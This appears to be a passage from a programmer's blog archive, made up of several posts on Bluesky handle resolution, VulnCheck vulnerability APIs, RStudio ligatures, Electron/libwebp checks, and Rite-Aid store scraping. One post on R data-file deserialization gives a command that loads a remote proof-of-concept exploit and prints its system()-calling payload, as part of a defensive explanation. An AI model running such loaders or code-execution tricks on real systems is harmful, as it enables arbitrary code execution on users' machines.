
Author Archives: hrbrmstr


Short post just to get the internets to index that I posted a repo with a small Bash script I’ve been using to resolve Bluesky/ATproto handles (like hrbrmstr.dev) to did:plc identifiers. Not sure why I didn’t do this ages ago, tbh.

Code is here but it’s small enough to include inline as well:

#!/usr/bin/env bash

set -euo pipefail

# Function to resolve Bluesky handle to DID:PLC
resolve_bluesky_handle() {
  local handle="${1:-}"

  # Remove leading '@' if present
  handle=$(echo "${handle}" | sed -e 's/^@//')

  # Check if curl is installed
  if ! command -v curl &>/dev/null; then
    echo "Error: curl is not installed."
    return 1
  fi

  # Check if jq is installed
  if ! command -v jq &>/dev/null; then
    echo "Error: jq is not installed."
    return 1
  fi

  api_url="https://bsky.social/xrpc/com.atproto.identity.resolveHandle"

  # Fetch the DID for the handle. With `set -e` in effect, checking `$?` after
  # an assignment never runs, so test the command substitutions directly.
  if ! response=$(curl --silent --fail --header "Accept: application/json" "${api_url}?handle=${handle}"); then
    echo "Error: Failed to fetch data from Bluesky API."
    return 1
  fi

  # Extract the DID from the response (`// empty` keeps a missing key from
  # becoming the literal string "null")
  if ! did=$(echo "${response}" | jq -r '.did // empty'); then
    echo "Error: Failed to parse JSON response."
    return 1
  fi

  # Check if DID is empty
  if [[ -z "${did}" ]]; then
    echo "Error: DID not found in the response."
    return 1
  fi

  echo "${did}"
}

# Check if exactly one argument is provided
if [[ $# -ne 1 ]]; then
  echo "Usage: $0 <handle>"
  exit 1
fi

resolve_bluesky_handle "${1}"
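
If you’d rather stay in R, the same lookup works against the identical com.atproto.identity.resolveHandle endpoint; here’s a minimal, hedged httr2 sketch (the function name and structure are mine, not from the repo):

library(httr2)

# Resolve a Bluesky/ATproto handle to its did:plc identifier via the same
# XRPC endpoint the Bash script calls
resolve_bluesky_handle <- function(handle) {
  handle <- sub("^@", "", handle)  # strip a leading '@' if present

  resp <- request("https://bsky.social/xrpc/com.atproto.identity.resolveHandle") |>
    req_url_query(handle = handle) |>
    req_perform() |>
    resp_body_json()

  resp$did
}

resolve_bluesky_handle("hrbrmstr.dev")
# expect something of the form "did:plc:…"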

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the rounds on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known, expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one who created them or you do not fully know their provenance.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.
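
If you’ve never bumped into active bindings, here’s a tiny, self-contained illustration of the mechanism (nothing exploit-specific, just base R):

# Merely *looking at* `totally_benign` runs the bound function
makeActiveBinding(
  "totally_benign",
  function() {
    message("…and arbitrary code just ran")
    42
  },
  globalenv()
)

totally_benign
#> …and arbitrary code just ran
#> [1] 42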

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print, that object lands in your global environment and gets called whenever print() is invoked. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.
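
To make that concrete, here’s a toy (and deliberately harmless) reconstruction of the masking trick; this is a sketch, not the actual exploit file:

# "attacker" side: save a function named `print` into a data file
print <- function(...) {
  message("attacker code runs here first")
  base::print(...)
}
save(print, file = "innocent.rda")

# "victim" side (fresh session): loading drops `print` into the global
# environment, where it masks base::print
load("innocent.rda")
print("hello")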

A tad more insidious is what happens when you quit R. By default, quit() will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from environment listings, so you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)
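
You can see both behaviors for yourself in a throwaway session:

# .Last() is run on normal termination (see ?quit), and dot-prefixed names
# are hidden from a plain ls()
.Last <- function() message("this runs as the session ends")

ls()                  # .Last does not show up
ls(all.names = TRUE)  # now it does
q("no")               # calls .Last unless you pass runLast = FALSE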

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which get called when the objects are garbage collected and, if registered with onexit = TRUE, when the R session ends.
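
For the curious, the finalizer mechanism looks like this:

e <- new.env()
reg.finalizer(e, function(obj) message("finalizer fired"), onexit = TRUE)

# the finalizer runs when `e` is garbage collected, or at session exit
# (because of onexit = TRUE), whichever comes first
rm(e)
invisible(gc())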

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on Linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds any. It’s a WIP, and issues + thoughtful PRs are welcome.
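
The gist of the approach (a rough sketch of the idea, not the actual check.R, which does quite a bit more) is to load the file into a quarantined environment so nothing lands in your global environment, then enumerate and str() what’s in there without calling any of it:

# load into an isolated environment, then inspect without executing anything
quarantine <- new.env(parent = emptyenv())
load("exploit.rda", envir = quarantine, verbose = TRUE)

for (nm in ls(quarantine, all.names = TRUE)) {
  cat("\n", nm, ":\n", sep = "")
  str(get(nm, envir = quarantine))
}

# NOTE: this is inspection, not a sandbox; truly untrusted files still belong
# inside a container (hence the Docker wrapper in the repo)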

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

I use Fantastical as it’s a much cleaner, more native interface than Google Calendar, which I’m stuck using.

I do like to use the command line more than GUIs and, while I have other things set up to work with Google Calendar from the CLI, I’ve always wanted to figure out how to pull data from Fantastical into the terminal as well.

So, I figured out a shortcut + Bash script combo to do that, and posted it into the box below. The link to the shortcut is in the comments of the script.

#!/usr/bin/env bash

# Changelog:
#
# 2024-03-23: Script created for scheduling tasks on macOS.
#             Added error handling, usage information, and best practices.

# Usage:
#
# This script is intended to be used for getting the day's schedule from Fantastical
# It takes an optional date parameter in the format YYYY-MM-DD and uses the
# macOS 'shortcuts' command to run a scheduling query task. If no date is provided,
# or if the provided date is invalid, it defaults to today's date.
#
# Shortcut URL: https://www.icloud.com/shortcuts/7dc5cf4801394d05b9a71e5044fbf461

# Exit immediately if a command exits with a non-zero status.
set -o errexit
# Make sure the exit status of a pipeline is the status of the last command to exit with a non-zero status, or zero if no command exited with a non-zero status.
set -o pipefail

# Function to clean up temporary files before script exits
cleanup() {
    rm -f "${SAVED}" "${OUTPUT}"
}

# Trap to execute the cleanup function on script exit
trap cleanup EXIT

# Check if a date parameter is provided
if [ "$1" ]; then
    INPUT_DATE=$(date -j -f "%Y-%m-%d" "$1" "+%Y-%m-%d" 2>/dev/null) || {
        echo "Invalid date format. Please use YYYY-MM-DD. Defaulting to today's date." >&2
        INPUT_DATE=$(date "+%Y-%m-%d")
    }
else
    INPUT_DATE=$(date "+%Y-%m-%d")
fi

# Create temporary files for saving clipboard contents and output
SAVED=$(mktemp)
OUTPUT=$(mktemp)

# Save current clipboard contents
pbpaste >"${SAVED}"

# Copy the input date to the clipboard
echo "${INPUT_DATE}" | pbcopy

# Run the 'sched' shortcut
shortcuts run "sched"

# Save the output from the 'sched' shortcut
pbpaste >"${OUTPUT}"

# Restore the original clipboard contents
pbcopy <"${SAVED}"

# Display the output from the 'sched' shortcut
cat "${OUTPUT}"

VulnCheck has some new, free API endpoints for the cybersecurity community.

Two extremely useful ones are for their extended version of CISA’s KEV, and an in-situ replacement for NVD’s sad excuse for an API and soon-to-be-removed JSON feeds.

There are two ways to work with these APIs. One is to retrieve a “backup” of the entire dataset as a ZIP file, and the other is to use the API to retrieve individual CVEs from each “index”.

You’ll need a free API key from VulnCheck to use these APIs.

All code shown makes the assumption that you’ve stored your API key in an environment variable named VULNCHECK_API_KEY.

After the curl examples, there’s a section on a small Golang CLI I made to make it easier to get combined extended KEV and NVDv2 CVE information in one CLI call for a given CVE.

Backups

Retrieving the complete dataset is a multi-step process. First, you make a call to the backup API endpoint for the index you want to back up. That returns some JSON containing a temporary AWS pre-signed URL (a mechanism for granting time-limited access to files stored in AWS S3). Then you download the ZIP file from that URL and, finally, extract its contents into a directory. The output differs between the NVDv2 and extended KEV indexes, but the core process is the same.

NVDv2

Here’s a curl idiom for the NVDv2 index backup. The result is a directory of uncompressed JSON that’s in the same format as the NVDv2 JSON feeds.

# Grab the temporary AWS pre-signed URL for the NVDv2 index and then download the ZIP file.
curl \
  --silent \
  --output vcnvd2.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/nist-nvd2" | jq -r '.data[].url'
    )"

rm -rf ./nvd2

# unzip it
unzip -q -o -d ./nvd2 vcnvd2.zip

# uncompress the JSON files
ls ./nvd2/*gz | xargs gunzip

tree ./nvd2
./nvd2
├── nvdcve-2.0-000.json
├── nvdcve-2.0-001.json
├── nvdcve-2.0-002.json
├── nvdcve-2.0-003.json
├── nvdcve-2.0-004.json
├── nvdcve-2.0-005.json
├── nvdcve-2.0-006.json
├── nvdcve-2.0-007.json
├── nvdcve-2.0-008.json
├── nvdcve-2.0-009.json
├── nvdcve-2.0-010.json
├── nvdcve-2.0-011.json
├── nvdcve-2.0-012.json
├── nvdcve-2.0-013.json
├── nvdcve-2.0-014.json
├── nvdcve-2.0-015.json
├── nvdcve-2.0-016.json
├── nvdcve-2.0-017.json
├── nvdcve-2.0-018.json
├── nvdcve-2.0-019.json
├── nvdcve-2.0-020.json
├── nvdcve-2.0-021.json
├── nvdcve-2.0-022.json
├── nvdcve-2.0-023.json
├── nvdcve-2.0-024.json
├── nvdcve-2.0-025.json
├── nvdcve-2.0-026.json
├── nvdcve-2.0-027.json
├── nvdcve-2.0-028.json
├── nvdcve-2.0-029.json
├── nvdcve-2.0-030.json
├── nvdcve-2.0-031.json
├── nvdcve-2.0-032.json
├── nvdcve-2.0-033.json
├── nvdcve-2.0-034.json
├── nvdcve-2.0-035.json
├── nvdcve-2.0-036.json
├── nvdcve-2.0-037.json
├── nvdcve-2.0-038.json
├── nvdcve-2.0-039.json
├── nvdcve-2.0-040.json
├── nvdcve-2.0-041.json
├── nvdcve-2.0-042.json
├── nvdcve-2.0-043.json
├── nvdcve-2.0-044.json
├── nvdcve-2.0-045.json
├── nvdcve-2.0-046.json
├── nvdcve-2.0-047.json
├── nvdcve-2.0-048.json
├── nvdcve-2.0-049.json
├── nvdcve-2.0-050.json
├── nvdcve-2.0-051.json
├── nvdcve-2.0-052.json
├── nvdcve-2.0-053.json
├── nvdcve-2.0-054.json
├── nvdcve-2.0-055.json
├── nvdcve-2.0-056.json
├── nvdcve-2.0-057.json
├── nvdcve-2.0-058.json
├── nvdcve-2.0-059.json
├── nvdcve-2.0-060.json
├── nvdcve-2.0-061.json
├── nvdcve-2.0-062.json
├── nvdcve-2.0-063.json
├── nvdcve-2.0-064.json
├── nvdcve-2.0-065.json
├── nvdcve-2.0-066.json
├── nvdcve-2.0-067.json
├── nvdcve-2.0-068.json
├── nvdcve-2.0-069.json
├── nvdcve-2.0-070.json
├── nvdcve-2.0-071.json
├── nvdcve-2.0-072.json
├── nvdcve-2.0-073.json
├── nvdcve-2.0-074.json
├── nvdcve-2.0-075.json
├── nvdcve-2.0-076.json
├── nvdcve-2.0-077.json
├── nvdcve-2.0-078.json
├── nvdcve-2.0-079.json
├── nvdcve-2.0-080.json
├── nvdcve-2.0-081.json
├── nvdcve-2.0-082.json
├── nvdcve-2.0-083.json
├── nvdcve-2.0-084.json
├── nvdcve-2.0-085.json
├── nvdcve-2.0-086.json
├── nvdcve-2.0-087.json
├── nvdcve-2.0-088.json
├── nvdcve-2.0-089.json
├── nvdcve-2.0-090.json
├── nvdcve-2.0-091.json
├── nvdcve-2.0-092.json
├── nvdcve-2.0-093.json
├── nvdcve-2.0-094.json
├── nvdcve-2.0-095.json
├── nvdcve-2.0-096.json
├── nvdcve-2.0-097.json
├── nvdcve-2.0-098.json
├── nvdcve-2.0-099.json
├── nvdcve-2.0-100.json
├── nvdcve-2.0-101.json
├── nvdcve-2.0-102.json
├── nvdcve-2.0-103.json
├── nvdcve-2.0-104.json
├── nvdcve-2.0-105.json
├── nvdcve-2.0-106.json
├── nvdcve-2.0-107.json
├── nvdcve-2.0-108.json
├── nvdcve-2.0-109.json
├── nvdcve-2.0-110.json
├── nvdcve-2.0-111.json
├── nvdcve-2.0-112.json
├── nvdcve-2.0-113.json
├── nvdcve-2.0-114.json
├── nvdcve-2.0-115.json
├── nvdcve-2.0-116.json
├── nvdcve-2.0-117.json
├── nvdcve-2.0-118.json
├── nvdcve-2.0-119.json
├── nvdcve-2.0-120.json
└── nvdcve-2.0-121.json

1 directory, 122 files

VulnCheck’s Extended KEV

Here’s a curl idiom for the extended KEV index backup. The result is a directory with a single uncompressed JSON file that’s in an extended format of what’s in the CISA KEV JSON.

# Grab the temporary AWS pre-signed URL for the extended KEV index and then download the ZIP file.
curl \
  --silent \
  --output vckev.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/vulncheck-kev" | jq -r '.data[].url'
    )"

rm -rf ./vckev

# unzip it
unzip -q -o -d ./vckev vckev.zip

tree ./vckev
./vckev
└── vulncheck_known_exploited_vulnerabilities.json

1 directory, 1 file
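
If you’d rather do the backup dance from R, here’s a rough httr2 sketch for the NVDv2 index; it assumes the same cookie-based token auth the curl calls above use:

library(httr2)

# Ask the backup endpoint for the temporary pre-signed URL, then download and
# unpack the ZIP file it points at
backup_meta <- request("https://api.vulncheck.com/v3/backup/nist-nvd2") |>
  req_headers(
    Accept = "application/json",
    Cookie = paste0("token=", Sys.getenv("VULNCHECK_API_KEY"))
  ) |>
  req_perform() |>
  resp_body_json()

zip_url <- backup_meta$data[[1]]$url

download.file(zip_url, "vcnvd2.zip", mode = "wb", quiet = TRUE)
unzip("vcnvd2.zip", exdir = "nvd2")

# the archive holds gzipped JSON shards; read one like so
shard <- list.files("nvd2", pattern = "\\.gz$", full.names = TRUE)[1]
nvd <- jsonlite::fromJSON(
  paste(readLines(gzfile(shard), warn = FALSE), collapse = "\n"),
  simplifyVector = FALSE
)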

Retrieving Information On Individual CVEs

While there are other, searchable fields for each index, the primary use case for most of us is getting information on individual CVEs. The API calls are virtually identical, apart from the selected index.

NOTE: the examples pipe the output through jq to make the API results easier to read.

NVDv2

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/nist-nvd2?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.056277,
  "_meta": {
    "timestamp": "2024-03-23T08:47:17.940032202Z",
    "index": "nist-nvd2",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "id": "CVE-2024-23334",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "published": "2024-01-29T23:15:08.563",
      "lastModified": "2024-02-09T03:15:09.603",
      "descriptions": [
        {
          "lang": "en",
          "value": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue."
        },
        {
          "lang": "es",
          "value": "aiohttp es un framework cliente/servidor HTTP asíncrono para asyncio y Python. Cuando se utiliza aiohttp como servidor web y se configuran rutas estáticas, es necesario especificar la ruta raíz para los archivos estáticos. Además, la opción 'follow_symlinks' se puede utilizar para determinar si se deben seguir enlaces simbólicos fuera del directorio raíz estático. Cuando 'follow_symlinks' se establece en Verdadero, no hay validación para verificar si la lectura de un archivo está dentro del directorio raíz. Esto puede generar vulnerabilidades de directory traversal, lo que resulta en acceso no autorizado a archivos arbitrarios en el sistema, incluso cuando no hay enlaces simbólicos presentes. Se recomiendan como mitigaciones deshabilitar follow_symlinks y usar un proxy inverso. La versión 3.9.2 soluciona este problema."
        }
      ],
      "references": [
        {
          "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/pull/8079",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f",
          "source": "security-advisories@github.com",
          "tags": [
            "Exploit",
            "Mitigation",
            "Vendor Advisory"
          ]
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/",
          "source": "security-advisories@github.com"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/",
          "source": "security-advisories@github.com",
          "tags": [
            "Mailing List"
          ]
        }
      ],
      "metrics": {
        "cvssMetricV31": [
          {
            "source": "nvd@nist.gov",
            "type": "Primary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "LOW",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH"
            },
            "exploitabilityScore": 3.9,
            "impactScore": 3.6
          },
          {
            "source": "security-advisories@github.com",
            "type": "Secondary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "HIGH",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 5.9,
              "baseSeverity": "MEDIUM"
            },
            "exploitabilityScore": 2.2,
            "impactScore": 3.6
          }
        ]
      },
      "weaknesses": [
        {
          "source": "security-advisories@github.com",
          "type": "Primary",
          "description": [
            {
              "lang": "en",
              "value": "CWE-22"
            }
          ]
        }
      ],
      "configurations": [
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "1.0.5",
                  "versionEndExcluding": "3.9.2",
                  "matchCriteriaId": "CC18B2A9-9D80-4A6E-94E7-8FC010D8FC70"
                }
              ]
            }
          ]
        },
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
                  "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646"
                }
              ]
            }
          ]
        }
      ],
      "_timestamp": "2024-02-09T05:33:33.170054Z"
    }
  ]
}

VulnCheck’s Extended KEV

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/vulncheck-kev?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.328855,
  "_meta": {
    "timestamp": "2024-03-23T08:47:41.025967418Z",
    "index": "vulncheck-kev",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "vendorProject": "aiohttp",
      "product": "aiohttp",
      "shortDescription": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue.",
      "vulnerabilityName": "aiohttp aiohttp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
      "required_action": "Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.",
      "knownRansomwareCampaignUse": "Known",
      "cve": [
        "CVE-2024-23334"
      ],
      "vulncheck_xdb": [
        {
          "xdb_id": "231b48941355",
          "xdb_url": "https://vulncheck.com/xdb/231b48941355",
          "date_added": "2024-02-28T22:30:21Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:ox1111/CVE-2024-23334.git"
        },
        {
          "xdb_id": "f1d001911304",
          "xdb_url": "https://vulncheck.com/xdb/f1d001911304",
          "date_added": "2024-03-19T16:28:56Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:jhonnybonny/CVE-2024-23334.git"
        }
      ],
      "vulncheck_reported_exploitation": [
        {
          "url": "https://cyble.com/blog/cgsi-probes-shadowsyndicate-groups-possible-exploitation-of-aiohttp-vulnerability-cve-2024-23334/",
          "date_added": "2024-03-15T00:00:00Z"
        }
      ],
      "date_added": "2024-03-15T00:00:00Z",
      "_timestamp": "2024-03-23T08:27:47.861266Z"
    }
  ]
}

vccve

There’s a project on Codeberg that has code and binaries for macOS, Linux, and Windows for a small CLI that gets you combined extended KEV and NVDv2 information all in one call.

The project README has examples and installation instructions.

If you’re on Fosstodon, please pop a note to the admins there to ban this blog as well (it’s using the WordPress federation features). We would not want their sensitive sensibilities to be offended by the equally “offensive” stuff I have posted and will post here, as I seem to have done via @hrbrmstr (which they’ve banned without recourse).

I had thought most folks likely knew this already, but if you are a user of RStudio dailies (this may apply to regular RStudio, but I only use the dailies) and are missing ligatures in the editor (for some fonts), the “fix” is pretty simple (some misguided folks think ligatures are daft).

RStudio, like VS Code and many other editors/apps, is just a special purpose web browser. That means ligatures are controlled via CSS. RStudio also supports themes. There are many built-in themes. I use this third-party one. We can use these themes to sneak in some CSS that gives you granular control over ligatures.

The CSS class we need to target is .ace_scroller. That’s the contents of the editor pane, console, and any other monospaced “scrolled text” components. If you’re wondering, “Why …ace…?”, that’s due to RStudio’s use of the Ace editor component. Say all the nice things you want about the Monaco editor component used by VS Code (et al.), but the wizards at Posit wield Ace better than I’ve seen any other app dev team.

You can start here to learn about all the ways you can (and may need to) customize ligatures, but the following worked for my new fav font family:

.ace_scroller {
  font-variant-ligatures: discretionary-ligatures;
  font-feature-settings: "dlig" 1;
}

There are many possible values for font-variant-ligatures, and you can fully customize the font-feature-settings to target only the ligatures you want (for example, the previously linked font has eight stylistic sets).

UPDATE

sailm-b has forked rscodeio and is maintaining an updated version.

FIN

If you were missing out before, hopefully this brings you back into the ligature fold.

If you’ve got 👀 on this blog (directly, or via syndication) you’d have to have been living under a rock to not know about the libwebp supply chain disaster. An unfortunate casualty of inept programming just happened to be any app in the Electron ecosystem that doesn’t undergo bleeding-edge updates.

Former cow-orker Tom Sellers (one of the best humans in cyber) did a great service to the macOS user community with tips on how to stay safe on macOS. His find + strings + grep combo was superbly helpful and I hope many macOS users did the command line dance to see how negligent their app providers were/are.

But, you still have to know what versions are OK and which ones are not to do that dance. And, having had yet-another immune system invasion (thankfully, not COVID, again) on top of still working through long COVID (#protip: you may be over the pandemic, but I guarantee it’s not done with you/us for a while) which re-sapped mobility energy, I put my sedentary time to less woesome use by hacking together a small, Golang macOS CLI to help ferret out bad Electron-based apps you may have installed.

I named it positron, since that’s kind of the opposite of Electron, and I was pretty creativity-challenged today.

It does virtually the same thing as Tom’s strings and grep does, just in a single, lightweight, universal, signed macOS binary.

When I ran it after the final build, all my Electron-based apps were 🔴. After deleting some, and updating others, this is my current status:

$ find /Applications -type f -name "*Electron Framework*" -exec ./positron "{}" \;
/Applications/Signal.app: Chrome/114.0.5735.289 Electron/25.8.4 🟢
/Applications/Keybase.app: Chrome/87.0.4280.141 Electron/11.5.0 🔴
/Applications/Raindrop.io.app: Chrome/102.0.5005.167 Electron/19.0.17 🔴
/Applications/1Password.app: Chrome/114.0.5735.289 Electron/25.8.1 🟢
/Applications/Replit.app: Chrome/116.0.5845.188 Electron/26.2.1 🟢
/Applications/lghub.app: Chrome/104.0.5112.65 Electron/20.0.0 🔴

It’s still on you to do the find (cooler folks run fd) since I’m not about to write a program that’ll rummage across your SSDs or disc drives, but it does all the Mach-O inspection internally, and then also does the SemVer comparison to let you know which apps still suck at keeping you safe.

FWIW, the Keybase folks did accept a PR for the libwebp thing, but darned if I will spend any time building it (I don’t run it anymore, anyway, so I should just delete it).

The aforementioned signed, universal, macOS binary is in the GitLab releases.

Stay safe out there!

Rite-Aid closed 60+ stores in 2021. They said they’d nuke over 1,000 of them over three years, back in 2022. And, they’re now about to close ~500 due to bankruptcy.

FWIW Heyward Donigan, Former President and CEO — in 2023 — took home $1,043,713 in cash, $7,106,993 in equity, and $617,105 in “other” (total $8,767,811) for this fine, bankrupt leadership. Lots of others got lots, too, for being incompetent.

Rite-Aid is under no obligation to provide a list to the public, nor to do any overt announcements regarding the closures.

Each closure has the potential to create or exacerbate food and pharmacy deserts in many regions.

You can get individual stores (like this one), but there are over 2,100 of them, so doing this manually is a non-starter.

Thus, I threw together a couple of R and bash scripts to help real data journalists out, in the event any of them can pry themselves away from the POTUS horse race.

One R script is to get the individual store URLs. The bash script is used to politely grab all 2,100+ store pages (I have a script I just re-use for things like this). The other R script extracts the JSON that’s tucked away in the HTML files to get the store info, which includes latitude, longitude, store number, and address (there is more data in there; I just pulled those fields).
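
To give a flavor of the JSON-extraction bit, here’s a hedged sketch (the <script> selector and field layout are assumptions on my part; the real selectors and fields are in the repo):

library(rvest)
library(jsonlite)

# Hypothetical: pull the embedded JSON out of one saved store page; the real
# script iterates over all 2,100+ pages grabbed by the bash script
extract_store_info <- function(html_path) {
  pg <- read_html(html_path)

  # assumes the store data is embedded in a JSON <script> block; adjust the
  # selector to match what the saved pages actually contain
  raw_json <- pg |>
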